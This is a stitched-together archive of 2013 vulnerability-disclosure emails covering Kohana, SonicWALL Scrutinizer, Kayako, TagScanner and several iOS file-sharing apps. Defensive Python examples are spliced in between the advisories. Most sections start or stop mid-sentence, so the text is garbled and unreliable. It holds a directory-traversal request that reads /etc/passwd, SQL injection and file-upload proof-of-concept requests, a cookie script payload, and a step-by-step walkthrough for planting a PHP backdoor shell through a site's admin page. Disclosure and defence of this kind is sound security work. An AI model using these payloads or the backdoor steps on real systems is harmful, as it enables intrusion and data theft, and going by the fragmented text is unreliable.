2013-01-27


References:
===
http://www.vulnerability-lab.com/get_content.php?id=841


VL-ID:
=
837


Common Vulnerability Scoring System:

7.1


Introduction:
=
Kohana is an open source, object oriented MVC web framework built using PHP5 by 
a team of volunteers that aims to be 
swift, secure, and small. (copy from vendor website) This is an OOP framework 
that is extremely DRY. Everything is built 
using strict PHP 5 classes and objects. Many common components are included: 
translation tools, database access, code 
profiling, encryption, validation, and more.

Extending existing components and adding new libraries is very easy. Uses the 
BSD license, so you can use and modify it for 
commercial purposes. Benchmarking a framework is hard and rarely reflects the 
real world, but Kohana is very efficient and 
carefully optimized for real world usage. Very well commented code and a simple 
routing structure makes it easy to understand 
what is happening. Simple and effective tools help identify and solve 
performance issues quickly.

(Copy of the Vendor Homepage: http://kohanaframework.org/ )



Abstract:
=
The Vulnerability Laboratory Research Team discovered a Directory Traversal web 
vulnerability in the Kohana v2.3.3 Content Management System.


Report-Timeline:

2013-01-27: Public Disclosure


Status:

Published


Affected Products:
==
Kohana
Product: Framework - Content Management System 2.3.3


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A Directory Traversal web vulnerability is detected in the Kohana Content 
Management System web application.
The vulnerability allows remote attackers to request local directories and 
files of the web server application system.

The vulnerability is located in the `master/classes/Kohana/Filebrowser.php` 
file at line 90, where the requested path directory is processed via a replace. 
The filter replaces `../` with an empty string and is applied to file read 
requests. 

Review: Kohana/Filebrowser.php

$thumb = Route::get('wysiwyg/filebrowser')
    ->uri(array(
        'action' => 'thumb',
        'path'   => str_replace(array($dir, DIRECTORY_SEPARATOR), array('', '/'), 
                                $filename)
    ));

Remote attackers can bypass the validation performed by the vulnerable replace 
function in the file browser to read local 
web server files via a directory (path) traversal attack.

Exploitation of the vulnerability requires no privileged application user 
account and no user interaction.
Successful exploitation of the vulnerability results in the reading of 
arbitrary system files, compromising the web server.
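The replace shown in the review is a single, non-recursive pass over the requested path, and a filter of that shape is the weakness the PoC below relies on. The following Python is an added example, not Kohana code: it mimics that filter, checks what it does and does not stop, and contrasts it with the resolve-and-compare check a file browser should use, where the joined path is normalised by the operating system and then required to still lie under the served directory. The directory layout and file names are constructed in a temporary directory.

```python
"""Added example (not Kohana project code): why a single-pass '../' strip does not
stop path traversal, and the resolve-and-compare check to use instead."""
import tempfile
from pathlib import Path
from typing import Dict, Optional


def strip_dotdot(requested: str) -> str:
    """Mimics the review above: one non-recursive replace of '../' with ''."""
    return requested.replace("../", "")


def vulnerable_lookup(root: Path, requested: str) -> Path:
    """Filter-then-trust: strip once, join, and use the result without re-checking."""
    return (root / strip_dotdot(requested)).resolve()


def safe_lookup(root: Path, requested: str) -> Optional[Path]:
    """Resolve the joined path, then require it to still lie under the resolved root.
    No blacklist of character sequences is involved, so doubled dots, duplicate
    slashes and symlinks are all handled by the OS-level normalisation."""
    root = root.resolve()
    candidate = (root / requested.lstrip("/")).resolve()
    try:
        candidate.relative_to(root)
    except ValueError:
        return None
    return candidate


def is_under(root: Path, candidate: Path) -> bool:
    """True when candidate, fully resolved, lies inside root."""
    try:
        candidate.resolve().relative_to(root.resolve())
        return True
    except ValueError:
        return False


def demo() -> Dict[str, bool]:
    """Run both lookups over a constructed directory layout and report what each allows."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "graphics"          # the directory the file browser should serve
        root.mkdir()
        (root / "logo.png").write_bytes(b"constructed image bytes")
        (Path(tmp) / "secret.txt").write_text("constructed file outside the served directory")

        return {
            # the strip filter does catch the textbook '../'
            "vuln_blocks_plain": is_under(root, vulnerable_lookup(root, "../secret.txt")),
            # but one pass over '....//' leaves '../' behind, and the result escapes the root
            "vuln_escapes_on_doubled": not is_under(root, vulnerable_lookup(root, "....//secret.txt")),
            # resolve-and-compare: the legitimate file is served, every escaping path is refused
            "safe_serves_benign": safe_lookup(root, "logo.png") == (root / "logo.png").resolve(),
            "safe_blocks_plain": safe_lookup(root, "../secret.txt") is None,
            "safe_blocks_stripped_doubled": safe_lookup(root, strip_dotdot("....//secret.txt")) is None,
            "safe_blocks_deep": safe_lookup(root, "../../../../../../etc/passwd") is None,
        }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

The check lives after normalisation, not before it: whatever the request string looks like, the only question asked is whether the path the filesystem would actually open is inside the served directory.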

Vulnerable Module(s):
[+] Filebrowser

Vulnerable Function(s):
[+] str_replace & dir

Vulnerable Parameter(s): 
[+] ?path


Proof of Concept:
=
The vulnerability can be exploited by remote attackers without a privileged 
application user account and without required user interaction.
For demonstration or to reproduce ...

Review: Kohana/Filebrowser.php

$thumb = Route::get('wysiwyg/filebrowser')
    ->uri(array(
        'action' => 'thumb',
        'path'   => str_replace(array($dir, DIRECTORY_SEPARATOR), array('', '/'), 
                                $filename)
    ));


Review: GET Request
GET http://media.[server].com/directory/graphics/?path=..%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd HTTP/1.0
Host: media.[server].com
User-Agent: Kami VL


PoC: 
http://media.[server].com/directory/graphics/?path=..%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd
 


Risk:
=
The security risk of the directory traversal web vulnerability is estimated as 
high(+).
 


Credits:

Vulnerability Laboratory [Research Team]  - Karim B. 
(k...@vulnerability-lab.com)



0day full - Free Monthly Websites v2.0 - Multiple Web Vulnerabilities

2013-02-04 Thread Vulnerability Lab
 Navigation Page.
Picture: http://i45.tinypic.com/vigzsp.png

3rd. Still at the same page, scroll down the page until you see this section : 
Sort Your Page Buttons/Links.
Pic : http://i46.tinypic.com/1040oxg.png
Change FROM dwi.php.html TO /dwi.php then Click Sort Navigation Pages.
Picture: http://i49.tinypic.com/24ec1l0.jpg

4th. Go to Edit Navigation Page.
http://www.massmoneywebsites.com/admin/edit_main_pages.php
Please Select a Page To Edit: dwi.php.html --- Select that page.

5th. Inspect element on dwi.php.html
Pic : http://i50.tinypic.com/29pq1ix.png
Change FROM option value=dwi.php.html selected=dwi.php.html/option
To option value=dwi.php selected=dwi.php/option
Picture: http://i47.tinypic.com/wtb0j6.png

6th. Enter A Page Title As You Would Like It To Be Seen. Fill with dwi.php
URL For This Page: main_pages/dwi.php 
Use the 'URL For This Page' field above: [Tick] 
Display This Page in Left Vertical Site Navigation: [Tick]
Display This Page in Top Horizontal Site Navigation Buttons: [Tick]
Picture: http://i46.tinypic.com/1zebnle.png

7th. Still at the same page, scroll down the page until you see this section : 
Enter Content For Your Page:
Click SOURCE button 
Press Enter Twice at the First Line then Paste your PHP Backdoor/PHP Shell 
below.
And Press Enter Twice at the Last Line.
*Please see 2 Pictures below If you dunno Understand :p
Picture 1 : http://i49.tinypic.com/1zlzxq0.png
Picture 2 : http://i48.tinypic.com/291kc9h.png

If you wanna do this, please remove your backdoor password.
Click Save edited navigation page.

8th. After this message  Data saved successfully  Appeared, Visit the Home 
Page and you will see the Backdoor Page
Picture : http://i49.tinypic.com/4rt1g4.png


Risk:
=
The security risk of the unauthorized file upload vulnerability via auth bypass 
is estimated as critical.


Credits:

X-Cisadane - (stefanus...@ymail.com)
Greetz 2: X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, 
Jakarta Anonymous Club and Ngobas






Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability

2013-02-14 Thread Vulnerability Lab
Title:
==
Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability


Date:
=
2013-02-13


References:
===
http://www.vulnerability-lab.com/get_content.php?id=789

#9984: Investigate Vulnerability Lab issues (this ticket included tracking the 
creation of our DBI shim to error on semi-colon)
#10149: Create a common function to escape characters that can be used for SQL 
injection
#10139: Review all mapping and flow analytics queries to make sure inputs 
included in SQL are escaped
#10141: Review all reporting and filtering queries to make sure inputs included 
in SQL are escaped
#10140: Review all alarm tab and admin tab queries to make sure inputs included 
in SQL are escaped


VL-ID:
=
789


Common Vulnerability Scoring System:

7.3


Introduction:
=
Dell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic 
analytics, visualization and reporting tool 
to measure and troubleshoot network performance and utilization while 
increasing productivity for enterprises and service providers. 
Scrutinizer supports a wide range of routers, switches, firewalls, and 
data-flow reporting protocols, providing unparalleled insight 
into application traffic analysis from IPFIX/NetFlow data exported by Dell 
SonicWALL firewalls, as well as support for a wide range 
of routers, switches, firewalls, and data-flow reporting protocols. IT 
administrators in charge of high throughput networks can 
deploy Scrutinizer as a virtual appliance for high performance environments. 

(Copy of the Vendor Homepage: 
http://www.sonicwall.com/us/en/products/Scrutinizer.html )



Abstract:
=
The Vulnerability Laboratory Research Team discovered a SQL injection 
vulnerability in Dell's SonicWALL OEM Scrutinizer v9.5.2 appliance 
application.


Report-Timeline:

2012-12-05: Researcher Notification & Coordination
2012-12-07: Vendor Notification
2013-01-08: Vendor Response/Feedback
2013-02-10: Vendor Fix/Patch
2013-02-11: Public Disclosure


Status:

Published


Affected Products:
==
DELL
Product: Sonicwall OEM Scrutinizer 9.5.2


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A blind SQL injection vulnerability was detected in the SonicWALL OEM 
Scrutinizer v9.5.2 appliance application.
The bug allows remote attackers to inject and execute their own SQL statements 
and thereby manipulate the affected application's DBMS.
The SQL injection vulnerability is located in the fa_web.cgi file, in the 
gadget listing module, via the vulnerable orderby and 
gadget parameters. Exploitation requires no user interaction and no 
privileged application user account. Successful exploitation of 
the remote SQL injection vulnerability results in DBMS and application compromise. 

Vulnerable File(s):
[+] fa_web.cgi

Vulnerable Module(s):
[+] gadget listing

Vulnerable Parameter(s):
[+] orderby
[+] gadget


Proof of Concept:
=
The remote SQL injection vulnerability can be exploited by remote attackers 
without a privileged application user account 
and without user interaction. For demonstration or to reproduce ...

PoC:
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes-1%27[SQL INJECTION VULNERABILITY!]&orderby=1&cachebreaker=23_52_5_814-1%27
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes&orderby=-1%27[SQL INJECTION VULNERABILITY!]&cachebreaker=23_52_5_814-1%27



Solution:
=
1) The Scrutinizer team created its own DB layer that will die if a semicolon is 
found within a SQL query.
2) We have changed more queries to pass inputs as bound variables to the DB 
engine, which prevents possible SQL injection.
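Added example (not the vendor's code and not part of the advisory): a Python/sqlite3 model of the two fixes listed above, run against a constructed gadgets table (the real Scrutinizer schema is not on the page; table and column names are assumptions). It shows why fix 1 on its own is not enough: the advisory's own PoC value `-1'` contains no semicolon, so the guard never fires and the stray quote reaches the SQL parser. Fix 2 (bound variables) settles the `gadget` value, but `ORDER BY` cannot take a bound parameter, so `orderby` needs an allow-list of known sort keys instead.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the gadget listing table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE gadgets (id INTEGER PRIMARY KEY, name TEXT, bytes INTEGER)")
    conn.executemany(
        "INSERT INTO gadgets (name, bytes) VALUES (?, ?)",
        [("applicationsbytes", 1200), ("topflows", 800), ("conversations", 2400)],
    )
    return conn


def query_with_semicolon_guard(conn, gadget, orderby):
    """Fix 1 from the advisory on its own: SQL is still assembled from the raw
    request parameters, and a DB layer refuses any statement containing ';'.
    Returns the rows, 'blocked' if the guard fired, or 'db-error' if the
    statement reached the SQL parser and was rejected there."""
    sql = f"SELECT name, bytes FROM gadgets WHERE name = '{gadget}' ORDER BY {orderby}"
    if ";" in sql:
        return "blocked"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        # A quote in the input changed the statement: the guard did not help.
        return "db-error"


# Fix 2 plus the extra step ORDER BY needs: a bound variable can only carry a
# value, never a column name or sort direction, so the request's orderby
# parameter is mapped through a fixed allow-list (assumed sort keys).
ALLOWED_ORDERBY = {"name": "name", "bytes": "bytes", "bytes_desc": "bytes DESC"}


def orderby_is_allowed(orderby):
    return orderby in ALLOWED_ORDERBY


def query_hardened(conn, gadget, orderby):
    if not orderby_is_allowed(orderby):
        raise ValueError("orderby value not in allow-list")
    sql = "SELECT name, bytes FROM gadgets WHERE name = ? ORDER BY " + ALLOWED_ORDERBY[orderby]
    # `gadget` travels as a bound parameter: the engine treats it as data,
    # so a quote inside it can no longer alter the statement.
    return conn.execute(sql, (gadget,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(query_with_semicolon_guard(db, "applicationsbytes-1'", "1"))
    print(query_hardened(db, "applicationsbytes-1'", "bytes"))
    print(query_hardened(db, "applicationsbytes", "bytes"))
```

With the page's PoC value the guarded version returns 'db-error' (the quote reached the parser), while the hardened version simply finds no row with that name and returns an empty list.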


Risk:
=
The security risk of the remote sql injection vulnerability is estimated as 
high(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)




MyFi Wireless Disk 1.2 iPad iPhone - Multiple Vulnerabilities

2013-02-21 Thread Vulnerability Lab
Title:
==
MyFi Wireless Disk 1.2 iPad iPhone - Multiple Vulnerabilities


Date:
=
2013-02-13


References:
===
http://www.vulnerability-lab.com/get_content.php?id=864


VL-ID:
=
864


Status:

Published






Kayako Fusion v4.51.1891 - Multiple Web Vulnerabilities

2013-02-25 Thread Vulnerability Lab
[PERSISTENT INJECTED SCRIPT CODE!]%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]) </div></div></div>
<div id="gridcontentcustomfieldgroupgrid"><form name="form_customfieldgroupgrid" id="form_customfieldgroupgrid" action="http://rem0ve.137.0.0.1:8080/admin/Base/CustomFieldGroup/Manage/" method="post" onsubmit="javascript: return false;">
<input autocomplete="OFF" name="csrfhash" value="z2hvplh1kar0dm8rzvwmln0ilddeunsc" type="hidden"><div id="widthwrapper" style="width: 100%;">
<div id="gridtoolbar"><div class="gridtoolbarnew" id="gridextendedtoolbar"><div class="gridtoolbarsub">
<ul><li><a href="http://rem0ve.137.0.0.1:8080/admin/Base/CustomFieldGroup/Insert" viewport="1"><img src="Manage-Dateien/icon_addplus.gif" align="absmiddle" border="0"> New</a></li></ul></div></div>

Reference(s):
http://rem0ve.137.0.0.1:8080/admin/Base/CustomFieldGroup/Manage



Review: Live-Chat - Visitor Group Title


<div id="" class="dialogcontainer"><div class="dialogok"></div><div class="dialogokcontainer"><div class="dialogtitle">
Inserted Visitor Group [PERSISTENT INJECTED SCRIPT CODE!]%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]) </div>

... or

<div class="ui-dialog-titlebar ui-widget-header ui-corner-all ui-helper-clearfix"><span id="ui-dialog-title-window_editgroup" class="ui-dialog-title"><img src="http://rem0ve.137.0.0.1:8080/__swift/themes/__cp/images/icon_window.gif" align="absmiddle" border="0"> Edit Visitor Group: [PERSISTENT INJECTED SCRIPT CODE!]%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]) 
[PERSISTENT INJECTED SCRIPT CODE!]</span>

Reference(s):
http://rem0ve.137.0.0.1:8080/admin/LiveChat/Group/Manage


Risk:
=
The security risk of the persistent input validation web vulnerabilities is 
estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)






TagScanner v5.1 - Stack Buffer Overflow Vulnerability

2013-03-13 Thread Vulnerability Lab
=00410041 edx=779cb46d esi= edi=
eip=41414141 esp=0018ea90 ebp=0018eab0 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010246
Tagscan+0x10041:
41414141 add byte ptr [eax],al  ds:002b:=??
0:000 !exchain
0018eaa4: ntdll!LdrRemoveLoadAsDataTable+d64 (779cb46d)
0018eed0: Tagscan+14420 (00414420)
0018eef0: Tagscan+1ead78 (005ead78)
0018f154: Tagscan+10041 (41414141)
Invalid exception stack at 41414141
0:000 u
Tagscan+0x10041:
41414141 add byte ptr [eax],al
00410043 00ac004100  add byte ptr [eax+eax+41h],ch
0041004a add byte ptr [eax],al
0041004c add byte ptr [eax],al
0041004e add byte ptr [eax],al
00410050 add byte ptr [eax],al
00410052 add byte ptr [eax],al
00410054 94  xchgeax,esp
0:000 a
41414141

--- APPCrash Logs ---
EventType=APPCRASH (BEX)
EventTime=130029411726060019
ReportType=2
Consent=1
ReportIdentifier=ddec5c9b-6102-11e2-adfe-efaefe8363dd
IntegratorReportIdentifier=ddec5c9a-6102-11e2-adfe-efaefe8363dd
WOW64=1
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=Tagscan.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=5.1.6.30
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=50f57b7e
Sig[3].Name=Fehlermodulname
Sig[3].Value=Tagscan.exe
Sig[4].Name=Fehlermodulversion
Sig[4].Value=5.1.6.30
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=50f57b7e
Sig[6].Name=Ausnahmecode
Sig[6].Value=c005
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=41414141
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.1.7601.2.1.0.768.3
DynamicSig[2].Name=Gebietsschema-ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Zusatzinformation 1
DynamicSig[22].Value=c9ed
DynamicSig[23].Name=Zusatzinformation 2
DynamicSig[23].Value=c9ed9ec450d4be6144400a9541f5eddb
DynamicSig[24].Name=Zusatzinformation 3
DynamicSig[24].Value=04ae
DynamicSig[25].Name=Zusatzinformation 4
DynamicSig[25].Value=04ae339f4a83b6a3d3bf04a428f6874f
UI[2]=C:\Program Files (x86)\TagScanner\Tagscan.exe
UI[3]=Ultimate TagScanner funktioniert nicht mehr
UI[4]=Windows kann online nach einer Lösung für das Problem suchen.
UI[5]=Online nach einer Lösung suchen und das Programm schließen
UI[6]=Später online nach einer Lösung suchen und das Programm schließen
UI[7]=Programm schließen
LoadedModule[0]=C:\Program Files (x86)\TagScanner\Tagscan.exe
LoadedModule[62]=C:\Program Files (x86)\TagScanner\plugins\bass_aac.dll
LoadedModule[63]=C:\Program Files (x86)\TagScanner\plugins\bass_alac.dll
LoadedModule[64]=C:\Program Files (x86)\TagScanner\plugins\bass_ape.dll
LoadedModule[65]=C:\Program Files (x86)\TagScanner\plugins\bass_mpc.dll
LoadedModule[66]=C:\Program Files (x86)\TagScanner\plugins\bass_ofr.dll
LoadedModule[67]=C:\Program Files (x86)\TagScanner\OptimFROG.dll
LoadedModule[68]=C:\Program Files (x86)\TagScanner\plugins\bass_spx.dll
LoadedModule[69]=C:\Program Files (x86)\TagScanner\plugins\bass_tta.dll
LoadedModule[70]=C:\Program Files (x86)\TagScanner\plugins\bass_wv.dll
LoadedModule[71]=C:\Program Files (x86)\TagScanner\plugins\bassflac.dll
LoadedModule[72]=C:\Program Files (x86)\TagScanner\plugins\basswma.dll
LoadedModule[73]=C:\Program Files (x86)\TagScanner\plugins\bassopus.dll
LoadedModule[74]=C:\Windows\system32\mswsock.dll
LoadedModule[75]=C:\Windows\System32\wshtcpip.dll
LoadedModule[76]=C:\Windows\system32\DNSAPI.dll
LoadedModule[77]=C:\Program Files (x86)\Bonjour\mdnsNSP.dll
LoadedModule[78]=C:\Windows\system32\Iphlpapi.DLL
LoadedModule[79]=C:\Windows\system32\WINNSI.DLL
LoadedModule[80]=C:\Windows\system32\rasadhlp.dll
LoadedModule[81]=C:\Windows\System32\wship6.dll
LoadedModule[82]=C:\Windows\system32\avrt.dll
FriendlyEventName=Nicht mehr funktionsfähig
ConsentKey=APPCRASH
AppName=Ultimate TagScanner
AppPath=C:\Program Files (x86)\TagScanner\Tagscan.exe


Solution:
=
The vulnerability can be patched by restricting the length of the input fields 
that are processed when loading the rename-folder-by-tag listing.



Risk:
=
The security risk of the local buffer overflow vulnerability is estimated as 
high(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)



MailOrderWorks v5.907 - Multiple Web Vulnerabilities

2013-04-01 Thread Vulnerability Lab
:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]







Wireless Disk PRO v2.3 iOS - Multiple Web Vulnerabilities

2013-05-13 Thread Vulnerability Lab
) to inject malicious script code 
on the application side (persistent) of the app's web service. 

The vulnerability is located in the index file directory listing module of the 
web server (http://localhost:6566/) when it processes and displays
filenames that were manipulated via the POST request method. The persistent 
script code is executed from the main index file directory 
listing module when the service lists the newly injected malicious 
filename as an item.

Exploitation of the persistent web vulnerability requires low or medium user 
interaction and no application user account.
Successful exploitation of the vulnerability can lead to persistent session 
hijacking (customers), account theft via persistent web 
attacks, persistent phishing, or stable (persistent) certificate mail 
notification context manipulation.

Vulnerable Application(s):
[+] Wireless Disk PRO v2.3 - iTunes or App Store (Apple)

Vulnerable Module(s):
[+] File Upload  (Web Server) [Remote]

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] Filename - Index File Dir Listing


Proof of Concept:
=
1.1
The file include web vulnerability can be exploited by remote attackers without 
an application user account and without user interaction. 
For demonstration or to reproduce ...

PoC: (POST)
-243701706111075
Content-Disposition: form-data; name="file"; filename="[FILE/PATH INCLUDE WEB VULNERABILITY].png"
Content-Type: image/gif  flag: 137


1.2
The command injection web vulnerability can be exploited by local, low-privileged 
device user accounts with low required user interaction.
For demonstration or to reproduce ...

DEVICE NAME: IPad360 ¥337

Standard Application Header:
<div id="header_bottom">The following files are the hosts live from IPad360 ¥337 WirelessDisk App Document folder</div>

Manipulated Application Header:
<div id="header_bottom">The following files are the hosts live from [COMMAND INJECTION VIA DEVICENAME!] WirelessDisk App Document folder</div>


1.3
The persistent script code injection web vulnerability can be exploited by 
remote attackers without an application user account 
and with medium required user interaction. For demonstration or to reproduce ...

Review:  Index File Dir Listing - Name
<table id="table1" border="0" cellpadding="1" cellspacing="2" width="741"><tbody><tr><td style="width:461px;background-color:#ebebeb;">
 ?? <a href="327.png" target="_blank">327.png</a></td><td style="width:100px;background-color:#e3e3e3;text-align:right;">
27.27 KB </td><td style="width:180px;text-align:center;background-color:#ebebeb;">2013-02-11 08:07:16</td></tr><tr>
<td style="width:461px;background-color:#ebebeb;"> ?? <a href="[PERSISTENT INJECTED SCRIPT CODE AS NAME!]" target="_blank">[PERSISTENT INJECTED SCRIPT CODE AS NAME!]%20%20%20%20</a></td>
<td style="width:100px;background-color:#e3e3e3;text-align:right;">27.27 KB </td><td style="width:180px;text-align:center;background-color:#ebebeb;">2013-02-11 08:07:35</td></tr>


Risk:
=
1.1
The security risk of the local file/path include web vulnerability via POST 
request method is estimated as critical.

1.2
The security risk of the local command injection vulnerability is estimated as 
high(-).

1.3
The security risk of the persistent input validation web vulnerability is 
estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)



File Lite 3.3 3.5 PRO iOS - Multiple Web Vulnerabilities

2013-05-13 Thread Vulnerability Lab
 an application user account 
but low or medium user interaction.
Successful exploitation results in client side cross site requests, 
unauthorized external redirects, client side phishing, 
client side session hijacking and client side module context manipulation.

Vulnerable Application(s):
[+] File Lite 3.3 & 3.5 PRO - iTunes or App Store (Apple)

Vulnerable Module(s):
[+] Files - GET Request

Vulnerable Parameter(s):
[+] filename


Proof of Concept:
=
1.1
The arbitrary file upload vulnerability can be exploited by remote attackers 
without an application user account or user interaction.
For demonstration or to reproduce ...

PoC: POST REQUEST METHOD - FILE UPLOAD

Host=192.168.2.104:8080

User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 
Firefox/20.0

Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language=en-US,en;q=0.5

Accept-Encoding=gzip, deflate
DNT=1

Referer=http://192.168.2.104:8080/

Connection=keep-alive
Content-Type=multipart/form-data; 
boundary=---48201118910051
Content-Length=98447
POSTDATA =-48201118910051
Content-Disposition: form-data; name="newfile"; filename="hacki-hack.png.txt.html.php.gif[FILE UPLOAD VULNERABILITY]"
Content-Type: image/gif
?PNG ...



Review:
[{'name':'.Private', 'id':0},{'name':'1234.png.txt.iso.php.gif', 
'id':1},{'name':'Recents', 'id':2},{'name':'benjamin.html', 'id':3}]


Reference(s):
http://localhost:8080/files
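Added example (not the app's code and not part of the advisory): a Python upload validator for a constructed image-sharing endpoint that implements the check the File Lite Solution 1.1 below describes and also covers the Wireless Disk 1.1 case above, where the multipart filename carried a path. Allowed extensions, the stem character set and the magic-byte table are assumptions of this example. A name is accepted only if it carries no path separator, has exactly one extension from the allow-list (so `hacki-hack.png.txt.html.php.gif` and `benjamin.html` are refused, as is `.Private`), and the body starts with the bytes of the declared image type, so the Content-Type header is never the only evidence.

```python
import re

# Extensions this constructed endpoint is willing to store (assumption).
ALLOWED_EXT = {"png", "gif", "jpg", "jpeg"}

# Leading bytes each allowed type must begin with (standard file signatures).
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Allowed characters for the part of the name before the extension.
STEM_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def validate_upload(filename, head):
    """Decide whether a multipart upload may be stored.

    filename: the raw filename= value from the Content-Disposition header.
    head:     the first bytes of the part body.
    Returns (True, stored_name) or (False, reason)."""
    # Wireless Disk 1.1: a client-supplied name must never carry a path.
    if "/" in filename or "\\" in filename or "\x00" in filename:
        return False, "path separator or NUL in filename"
    # File Lite 1.1: exactly one extension, so a.png.php.gif is refused, and no
    # dot-files such as .Private.
    parts = filename.split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False, "missing or multiple extensions"
    stem, ext = parts[0], parts[1].lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension '{ext}' not allowed"
    if not STEM_RE.fullmatch(stem):
        return False, "stem contains disallowed characters"
    # The body has to look like the type the name claims; Content-Type is
    # attacker-controlled and is not consulted at all.
    if not any(head.startswith(m) for m in MAGIC[ext]):
        return False, "body does not match the declared image type"
    return True, f"{stem}.{ext}"


if __name__ == "__main__":
    # Constructed sample parts: a real PNG header and the names from the
    # advisory's PoC and listing.
    png_head = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
    for name, head in [
        ("327.png", png_head),
        ("hacki-hack.png.txt.html.php.gif", b"GIF89a"),
        ("benjamin.html", b"<html>"),
        (".Private", b""),
    ]:
        print(name, "->", validate_upload(name, head))
```

Storing the file under a server-generated name (for example a random id plus the validated extension) on top of this check removes the client-supplied name from the file system entirely, which is the simplest way to keep a later listing from ever echoing it.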




1.2
The persistent script code injection web vulnerability can be exploited by 
remote attackers without an application user account and
with low user interaction. For demonstration or to reproduce ...


PoC: File Name - Index Output Listing

<a href="http://192.168.2.104:8080/files/%3E%22%3Ciframe%20src=a%3E" class="file">
[PERSISTENT SCRIPT CODE INJECT VULNERABILITY!] src="Welcome%20to%20Evereader%20Wi-Fi%20Sharing%21_files/hack.txt"</a>
</td><td class='del'><form action='/files/%3E%22%3C[PERSISTENT SCRIPT CODE INJECT VULNERABILITY!]%3E' method='post'><input name='_method' value='delete' type='hidden'/><input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a>



1.3
The client side script code injection web vulnerability can be exploited by 
remote attackers without an application user account and 
with low or medium required user interaction. For demonstration or to reproduce ...

PoC: GET REQUEST METHOD - File Request

--- Request Header ---
Host=192.168.2.104:8080
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept=application/json, text/javascript, */*
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
DNT=1
X-Requested-With=XMLHttpRequest

Referer=http://192.168.2.104:8080/
Cookie=USERID=<SCRIPT>document.cookie=true</SCRIPT>; true
Connection=keep-alive


--- Response Header ---
Status=OK - 200
Accept-Ranges=bytes
Content-Length=171
Cache-Control=private, max-age=0, must-revalidate
Content-Type=text/plain; charset=utf-8
Date=Fr., 26 Apr 2013 17:48:48 GMT


URL: http://localhost:8080/files?Fri%20Apr%2026%202013%2019:46:51%20GMT+0200


Solution:
=
1.1
Parse the POST method request when processing the upload of a file with a wrong 
extension and disallow double extensions. 
Restrict the file access of web files such as html, php or JavaScript.
Implement your own exception handling to prevent future arbitrary file 
uploads.

1.2
Restrict the input/output of the del filename and file input parameter. Encode 
and parse the output of both vulnerable values to patch the issue.

1.3
Parse the request parameter together with its flag details to fix the vulnerability in 
the GET request.


Risk:
=
1.1
The security risk of the remote arbitrary file upload vulnerability is 
estimated as high(-).

1.2
The security risk of the persistent input validation web vulnerability is 
estimated as medium(+).

1.3
The security risk of the client side cross site scripting vulnerability is 
estimated as low(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com) [www.vulnerability-lab.com]


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor

Sony PS3 Firmware v4.31 - Code Execution Vulnerability

2013-05-21 Thread Vulnerability Lab
.

The PS3 filter system of the SpeicherDaten (DienstProgramm) module does not 
recognize special chars and does not provide 
